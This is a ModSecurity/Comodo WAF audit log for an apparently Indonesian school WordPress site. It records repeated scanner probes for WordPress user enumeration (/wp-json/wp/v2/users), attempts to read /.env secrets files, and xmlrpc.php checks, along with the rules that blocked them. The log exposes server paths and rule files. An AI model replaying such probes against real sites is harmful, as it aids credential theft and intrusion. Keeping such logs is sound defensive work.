Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc19b301-Z-- --37537919-A-- [17/May/2025:20:06:33 +0700] aCiJ2XyxdQCiyU1ENFdxZAAAABI 103.236.140.4 59784 103.236.140.4 8181 --37537919-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --37537919-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37537919-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747487193268975 3337 (- - -) Stopwatch2: 1747487193268975 3337; combined=1520, p1=488, p2=998, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37537919-Z-- --b1981a0d-A-- [17/May/2025:20:06:44 +0700] aCiJ5HyxdQCiyU1ENFdxdgAAAAQ 103.236.140.4 60024 103.236.140.4 8181 --b1981a0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.218 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b1981a0d-C-- demo.sayHello --b1981a0d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1981a0d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747487204463733 7948 (- - -) Stopwatch2: 1747487204463733 7948; combined=6225, p1=622, p2=5350, p3=38, p4=41, p5=104, sr=77, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1981a0d-Z-- --b5f9cf59-A-- [17/May/2025:20:27:34 +0700] aCiOxum4kjNN-hEbWjKCrAAAAFI 103.236.140.4 56540 103.236.140.4 8181 --b5f9cf59-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.65.171.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.65.171.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b5f9cf59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5f9cf59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747488454081644 3037 (- - -) Stopwatch2: 1747488454081644 3037; combined=1390, p1=464, p2=897, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5f9cf59-Z-- --534b1844-A-- [17/May/2025:20:34:09 +0700] aCiQURKi5m5upc8uMd7r3wAAAMU 103.236.140.4 36536 103.236.140.4 8181 --534b1844-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 134.199.149.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 134.199.149.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --534b1844-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --534b1844-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747488849790327 831 (- - -) Stopwatch2: 1747488849790327 831; combined=313, p1=264, p2=0, p3=0, p4=0, p5=49, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --534b1844-Z-- --47b43f29-A-- [17/May/2025:21:13:58 +0700] aCiZphKi5m5upc8uMd76eQAAANU 103.236.140.4 54010 103.236.140.4 8181 --47b43f29-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.93.75.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.93.75.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --47b43f29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47b43f29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747491238365039 2742 (- - -) Stopwatch2: 1747491238365039 2742; combined=1251, p1=431, p2=790, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47b43f29-Z-- --92bfd914-A-- [17/May/2025:21:25:51 +0700] aCicb3yxdQCiyU1ENFeKegAAABI 103.236.140.4 39588 103.236.140.4 8181 --92bfd914-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --92bfd914-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92bfd914-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747491951914534 2899 (- - -) Stopwatch2: 1747491951914534 2899; combined=1316, p1=450, p2=837, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92bfd914-Z-- --9b7ae471-A-- [17/May/2025:21:26:03 +0700] aCice3yxdQCiyU1ENFeKhQAAAAI 103.236.140.4 39804 103.236.140.4 8181 --9b7ae471-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9b7ae471-C-- demo.sayHello --9b7ae471-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b7ae471-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747491963273281 6475 (- - -) Stopwatch2: 1747491963273281 6475; combined=4758, p1=539, p2=3963, p3=60, p4=35, p5=95, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b7ae471-Z-- --873d2140-A-- [17/May/2025:21:32:50 +0700] aCieEum4kjNN-hEbWjKSfAAAAEA 103.236.140.4 47656 103.236.140.4 8181 --873d2140-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.182.204 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.182.204 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36 --873d2140-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --873d2140-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747492370694712 753 (- - -) Stopwatch2: 1747492370694712 753; combined=311, p1=267, p2=0, p3=0, p4=0, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --873d2140-Z-- --4bdfeb61-A-- [17/May/2025:21:52:42 +0700] aCiiugTOsBn9MSWb6WLE8QAAAII 103.236.140.4 42254 103.236.140.4 8181 --4bdfeb61-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4bdfeb61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bdfeb61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747493562681101 3890 (- - -) Stopwatch2: 1747493562681101 3890; combined=2161, p1=620, p2=1489, p3=0, p4=0, p5=52, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bdfeb61-Z-- --69630169-A-- [17/May/2025:21:52:54 +0700] aCiixhKi5m5upc8uMd4GvQAAANU 103.236.140.4 42534 103.236.140.4 8181 --69630169-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.149 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --69630169-C-- demo.sayHello --69630169-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --69630169-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747493574681944 5743 (- - -) Stopwatch2: 1747493574681944 5743; combined=4186, p1=580, p2=3384, p3=32, p4=41, p5=89, sr=125, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69630169-Z-- --694c7c63-A-- [17/May/2025:22:00:52 +0700] aCikpHyxdQCiyU1ENFeVZQAAAAQ 103.236.140.4 52706 103.236.140.4 8181 --694c7c63-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --694c7c63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --694c7c63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494052434865 4229 (- - -) Stopwatch2: 1747494052434865 4229; combined=2355, p1=713, p2=1604, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --694c7c63-Z-- --125c3126-A-- [17/May/2025:22:00:58 +0700] aCikqnyxdQCiyU1ENFeVbgAAAA8 103.236.140.4 52834 103.236.140.4 8181 --125c3126-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --125c3126-C-- demo.sayHello --125c3126-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --125c3126-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494058567244 6642 (- - -) Stopwatch2: 1747494058567244 6642; combined=5164, p1=576, p2=4324, p3=48, p4=67, p5=88, sr=75, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --125c3126-Z-- --03c1087c-A-- [17/May/2025:22:01:41 +0700] aCik1em4kjNN-hEbWjKZDAAAAEQ 103.236.140.4 53718 103.236.140.4 8181 --03c1087c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03c1087c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03c1087c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494101823717 2511 (- - -) Stopwatch2: 1747494101823717 2511; combined=1258, p1=409, p2=819, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03c1087c-Z-- --159e2757-A-- [17/May/2025:22:01:48 +0700] aCik3ATOsBn9MSWb6WLHlgAAAJg 103.236.140.4 53826 103.236.140.4 8181 --159e2757-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.208 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --159e2757-C-- demo.sayHello --159e2757-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --159e2757-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494108737637 6301 (- - -) Stopwatch2: 1747494108737637 6301; combined=4646, p1=571, p2=3837, p3=31, p4=34, p5=103, sr=76, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --159e2757-Z-- --c431ad63-A-- [17/May/2025:22:04:03 +0700] aCilY3yxdQCiyU1ENFeWjwAAABA 103.236.140.4 56334 103.236.140.4 8181 --c431ad63-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c431ad63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c431ad63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494243985570 2805 (- - -) Stopwatch2: 1747494243985570 2805; combined=1260, p1=414, p2=817, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c431ad63-Z-- --adc32f06-A-- [17/May/2025:22:04:11 +0700] aCila-m4kjNN-hEbWjKZkAAAAEU 103.236.140.4 56448 103.236.140.4 8181 --adc32f06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.5 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --adc32f06-C-- demo.sayHello --adc32f06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --adc32f06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494251726847 5312 (- - -) Stopwatch2: 1747494251726847 5312; combined=4284, p1=548, p2=3508, p3=33, p4=37, p5=94, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --adc32f06-Z-- --c622573f-A-- [17/May/2025:22:04:22 +0700] aCildum4kjNN-hEbWjKZpQAAAEI 103.236.140.4 56672 103.236.140.4 8181 --c622573f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c622573f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c622573f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494262216171 2426 (- - -) Stopwatch2: 1747494262216171 2426; combined=1058, p1=376, p2=658, p3=0, p4=0, p5=24, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
